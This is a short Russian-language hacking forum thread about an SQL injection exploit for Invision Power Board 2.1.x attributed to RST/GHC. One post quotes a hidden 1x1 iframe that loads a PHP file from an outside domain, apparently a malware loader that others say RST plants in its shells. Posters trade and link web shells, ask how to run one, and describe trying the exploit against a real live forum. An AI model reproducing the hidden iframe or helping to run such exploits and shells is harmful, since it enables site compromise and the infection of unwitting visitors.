![]() |
Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
Цитата:
|
во.крутая вещь.уже протестировал.вообще супер.
|
Код:
<div style="VISIBILITY: hidden"><iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe></div> |
zeppe1in
+1 RST всегда отличались тем что любили счетчики на шеллы влепить или же ифреймик что собственно и наблюдаем=)) |
шелл от рст дерьмо
|
Тогда где шел от ZaCo???
|
http://zaco.cup.su/uploads/SmWsHbZ.txt вообще он тоже дерьмовый но суть не в этом :D :D
|
а вчом
|
А как этот шел запускается .Что то он у меня не запускается
|
Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.
|
| Время: 04:17 |